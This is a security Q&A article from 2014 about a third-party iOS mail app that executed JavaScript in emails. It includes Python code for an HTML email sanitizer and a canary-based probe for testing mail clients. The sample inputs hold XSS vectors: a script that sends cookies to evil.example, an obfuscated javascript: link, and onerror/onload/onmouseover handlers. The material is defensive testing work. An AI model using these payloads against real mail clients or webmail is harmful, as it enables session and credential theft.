
Mobile email security: Mitigating JavaScript risks, data loss

Mitigating JavaScript risks is essential to ensuring mobile email security. Discover how to keep your enterprise safe.

I recently read that a third-party mail app for iOS auto-executes JavaScript. Why didn't the Apple App Store flag that as a problem, and how can our organization keep our users safe from JavaScript risks, short of putting our own app vetting system in place for BYOD?

Ask the Expert

Do you have an application security question for Michael Cobb? Submit it now via email! (All questions are anonymous.)

Mailbox is a popular third-party email app for iPhone and iPad that is now owned by Dropbox. Web application security expert Michele Spagnuolo recently highlighted the fact that the app auto-executes any JavaScript contained in the body of incoming HTML emails. The app also loads external images with no option to disable the behavior.

At first glance, this may seem like a fuss about nothing; Apple's App Store didn't flag it as a problem, and some security commentators also wrote that it wasn't an issue. On top of that, many of today's Web 2.0 sites are packed with JavaScript and can't work without it.

So, why is JavaScript considered dangerous in the body of an email when it's not seen as a vulnerability in webpages? Are JavaScript risks more detrimental in email than the Web?

In reality, it's a question of control. A user chooses whether to visit a particular webpage, but has no control over who can send them an email. Spam filters can be configured to block certain types of content or mail from particular addresses, but some malicious or spam messages will inevitably get through. A website's TLS certificate lets the browser verify which site it is actually talking to, and browser settings and plug-ins such as NoScript control which scripts on a page are allowed to run. With email, the sender details in the From: field are easy for an attacker to forge (SPF, DKIM and DMARC checks at the receiving domain reduce this but do not eliminate it), so unwanted and unrequested content can easily arrive in an email client. Email therefore has to be sanitized as much as possible by default, with the user given the option of displaying additional, and potentially dangerous, content such as remote images if they choose to.

JavaScript has long been used by cybercriminals to hide or load malicious content in webpages, track user activity, and steal login credentials. To contain these attacks, Web browsers enforce the Same Origin Policy, which lets a script read data only from the origin (scheme, host and port) that served the page it runs in. An email has no origin of its own: if the message is viewed in a webmail service, a script embedded in it runs with the origin of the webmail site itself, which amounts to stored cross-site scripting with access to the victim's session and mailbox. This is why virtually all email clients refuse to execute JavaScript in messages; even webmail sites whose own pages are built on JavaScript strip or suppress any script contained in the emails they display.
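The "sanitize by default, let the user opt in" approach described above, as an added example that is not Mailbox's, Dropbox's or any webmail provider's code: an allowlist-based sanitizer for an HTML email body, written against the Python standard library only. It drops script, style, iframe, svg and similar elements with their content, drops every on* handler and style attribute, keeps only http/https/mailto links after defeating "java<tab>script:" scheme tricks, leaves cid: (inline attachment) images alone, and replaces external image references with a data-blocked-src attribute plus a list the client can use for a "load images" prompt. The sample message and the hostnames evil.example, track.example and portal.example are constructed for the example. A production client should still prefer a maintained sanitizer such as DOMPurify in a browser context; this block shows what such a sanitizer must decide, not a drop-in replacement.

```python
"""Allowlist sanitizer for HTML email bodies (added example, standard library only)."""
import html
import re
from dataclasses import dataclass, field
from html.parser import HTMLParser

# Elements a mail client can safely render. Anything not listed loses its tag
# but keeps its text, so <marquee>hello</marquee> still reads "hello".
ALLOWED_TAGS = {
    "p", "br", "hr", "div", "span", "b", "i", "u", "em", "strong", "a", "img",
    "ul", "ol", "li", "table", "thead", "tbody", "tr", "td", "th",
    "h1", "h2", "h3", "blockquote", "pre", "code",
}
# Elements removed together with everything inside them.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "form",
                     "svg", "math", "noscript", "template", "frameset", "frame"}
VOID_TAGS = {"br", "hr", "img"}
# Attributes kept per tag. on*, style, formaction etc. never get through.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"alt", "width", "height"}}
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")
_CONTROL_RE = re.compile(r"[\x00-\x20\x7f]")  # browsers skip these in "java\tscript:"


def url_scheme(url: str) -> str:
    """Scheme of a URL after whitespace/control-character tricks are stripped."""
    m = _SCHEME_RE.match(_CONTROL_RE.sub("", url).lower())
    return m.group(1) if m else ""


@dataclass
class SanitizedEmail:
    html: str
    blocked_images: list = field(default_factory=list)  # user may opt in to these
    removed: dict = field(default_factory=dict)         # what was stripped, for logging/UI


class EmailHTMLSanitizer(HTMLParser):
    # Comments (including <!--[if IE]> blocks) are dropped by HTMLParser's default no-op.
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.stack, self.blocked_images, self.removed = [], [], [], {}
        self._drop_depth = 0  # > 0 while inside a DROP_WITH_CONTENT element

    def _count(self, what):
        self.removed[what] = self.removed.get(what, 0) + 1

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:          # HTMLParser already lower-cases names
            value = value or ""
            if name.startswith("on") or name == "style":
                self._count(f"attr:{name}")
            elif tag == "img" and name == "src":
                if url_scheme(value) == "cid":         # inline attachment: fine
                    kept.append(("src", value))
                else:                                  # external fetch = tracking beacon
                    self.blocked_images.append(value)
                    kept.append(("data-blocked-src", value))
            elif tag == "a" and name == "href":
                value = _CONTROL_RE.sub("", value)
                if url_scheme(value) in {"http", "https", "mailto"}:
                    kept.append(("href", value))
                else:
                    self._count("href:" + (url_scheme(value) or "relative"))
            elif name in ALLOWED_ATTRS.get(tag, ()):
                kept.append((name, value))
        return "".join(f' {n}="{html.escape(v, quote=True)}"' for n, v in kept)

    def handle_starttag(self, tag, attrs):
        if self._drop_depth:
            self._drop_depth += int(tag in DROP_WITH_CONTENT)
        elif tag in DROP_WITH_CONTENT:     # an unclosed <svg ...> drops the rest: fail closed
            self._drop_depth += 1
            self._count(f"tag:{tag}")
        elif tag not in ALLOWED_TAGS:
            self._count(f"tag:{tag}")
        else:
            self.out.append(f"<{tag}{self._clean_attrs(tag, attrs)}>")
            if tag not in VOID_TAGS:
                self.stack.append(tag)

    def handle_endtag(self, tag):
        if self._drop_depth:
            self._drop_depth -= int(tag in DROP_WITH_CONTENT)
        elif tag in self.stack:            # close everything opened since; keeps output balanced
            while (top := self.stack.pop()) != tag:
                self.out.append(f"</{top}>")
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(html.escape(data, quote=False))

    def result(self) -> SanitizedEmail:
        self.close()
        while self.stack:
            self.out.append(f"</{self.stack.pop()}>")
        return SanitizedEmail("".join(self.out), self.blocked_images, self.removed)


def sanitize_html_email(source: str) -> SanitizedEmail:
    p = EmailHTMLSanitizer()
    p.feed(source)
    return p.result()


# Constructed sample message; all hostnames are made up for this example.
SAMPLE = (
    '<html><body><p>Hi <b>Alice</b>,</p>'
    '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
    '<img src="https://track.example/pixel.gif?u=alice" width="1" height="1">'
    '<a href="java\tscript:alert(1)" onmouseover="steal()">Reset password</a> '
    '<a href="https://portal.example/reset">or here</a>'
    '<div style="background:url(https://track.example/css)">body</div>'
    '<img src="cid:logo@example"><svg onload="alert(1)"></svg></body></html>'
)

if __name__ == "__main__":
    r = sanitize_html_email(SAMPLE)
    print(r.html, r.blocked_images, r.removed, sep="\n")
```

The returned removed dictionary is worth logging: a sudden rise in tag:script or href:javascript counts for one sender is a cheap phishing-campaign signal, and blocked_images is exactly the list a client needs to offer "load remote images" as an explicit user choice rather than a default.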

While the Mailbox app is not malicious and its behavior doesn't violate any of the App Store rules, its poor design could have easily been used by an attacker, particularly for delivering potent spear-phishing emails. While the data that could be stolen would be limited by the iOS sandbox, an email app has access to a lot of potentially valuable information. On a jailbroken device, the damage would be much worse.

Although Mailbox has fixed the issue and now strips JavaScript and images out of messages before delivering them to mobile devices, the episode still highlights the need for enterprises to vet every app that will be used on devices connecting to the corporate network. Administrators should check an app's security settings and verify that they actually work rather than trusting the description: for a mail client, that means sending it a test message containing a script, an inline event handler and an external image that points at a server you control, then confirming that nothing executes and nothing is fetched without the user's consent. They should also capture the traffic the app sends from the device (for example by routing the device through a Wi-Fi access point or proxy they control) and examine it with a network protocol analyzer such as Wireshark to see what is transmitted and whether it is encrypted. An enterprise app store makes distributing the approved apps to employees straightforward.
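One way to do the "validate that the settings actually work" step, as an added example rather than anything from the article or from Mailbox: build a probe email whose HTML part contains one vector per behaviour you care about (remote image, script tag, inline event handler, CSS url(), iframe), each pointing at a distinct URL on a canary web server you run, then read that server's access log to see which vectors the client under test actually fetched. The canary host, the mail addresses and the access-log lines below are constructed for the example; the token keeps runs apart when several devices are tested against the same canary.

```python
"""Probe message plus canary-log check for a mail client's rendering (added example)."""
import re
import secrets
from email.message import EmailMessage


# Every vector embeds the run's token and its own name in the URL it would fetch,
# so a single line in the canary server's access log names the exact behaviour.
def probe_vectors(canary: str, token: str) -> dict:
    url = lambda name: f"{canary}/{token}/{name}"
    return {
        "img":     f'<img src="{url("img")}" width="1" height="1">',           # image auto-load
        "script":  f'<script src="{url("script")}"></script>',                 # <script> executed
        "onerror": f'<img src="x" onerror="(new Image).src=\'{url("onerror")}\'">',  # handler ran
        "css":     f'<div style="background:url({url("css")})">&nbsp;</div>',  # CSS fetch
        "iframe":  f'<iframe src="{url("iframe")}"></iframe>',                 # frame auto-load
    }


def build_probe_email(sender: str, recipient: str, canary: str, token: str) -> EmailMessage:
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, recipient, f"client probe {token}"
    msg.set_content("Plain-text part: a client that shows this instead of the HTML is fine.")
    vectors = "".join(probe_vectors(canary, token).values())
    msg.add_alternative(f"<html><body><p>probe {token}</p>{vectors}</body></html>",
                        subtype="html")
    return msg


# Combined-log-format request line, e.g. "GET /9f3c2a1b7e4d/script HTTP/1.1"
_LOG_RE = re.compile(r'"GET /(?P<token>[A-Za-z0-9]+)/(?P<vector>[a-z]+)[ "]')


def fired_vectors(log_lines, token: str) -> set:
    """Vectors the client actually fetched, taken from the canary server's access log."""
    hits = set()
    for line in log_lines:
        m = _LOG_RE.search(line)
        if m and m.group("token") == token:
            hits.add(m.group("vector"))
    return hits


def verdict(hits: set) -> dict:
    """Turn raw hits into the three questions an administrator is asking."""
    return {
        "executes_javascript": bool(hits & {"script", "onerror"}),
        "loads_external_images": "img" in hits,
        "loads_css_urls_or_frames": bool(hits & {"css", "iframe"}),
    }


# Constructed access-log lines as a canary server would record them. 10.0.0.23 is
# the device under test; the last line belongs to a different probe run.
CANARY_LOG = [
    '10.0.0.23 - - [12/Apr/2014:10:02:11 +0000] "GET /x7Qp9/img HTTP/1.1" 200 43 "-" "Mozilla/5.0 (iPhone)"',
    '10.0.0.23 - - [12/Apr/2014:10:02:11 +0000] "GET /x7Qp9/onerror HTTP/1.1" 200 43 "-" "Mozilla/5.0 (iPhone)"',
    '10.0.0.23 - - [12/Apr/2014:10:02:12 +0000] "GET /x7Qp9/script HTTP/1.1" 200 43 "-" "Mozilla/5.0 (iPhone)"',
    '10.0.0.99 - - [12/Apr/2014:10:05:40 +0000] "GET /b2c4d6/img HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Android)"',
]

if __name__ == "__main__":
    token = secrets.token_hex(6)   # hex only, so it matches _LOG_RE
    msg = build_probe_email("probe@corp.example", "tester@corp.example",
                            "https://canary.corp.example", token)
    print(msg.as_string())
    # To send for real: smtplib.SMTP("mail.corp.example").send_message(msg),
    # open the message in the app under test, then feed the canary log to fired_vectors().
    print(verdict(fired_vectors(CANARY_LOG, "x7Qp9")))
```

For the constructed log the verdict is that the client executed JavaScript (both the script tag and the onerror handler fetched their URLs) and auto-loaded a remote image, which is the behaviour the article describes; a client that passes fetches nothing until the user explicitly asks for remote content. Run the probe once per app and once per app update, since a server-side fix like Mailbox's can be undone silently.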

This was last published in April 2014
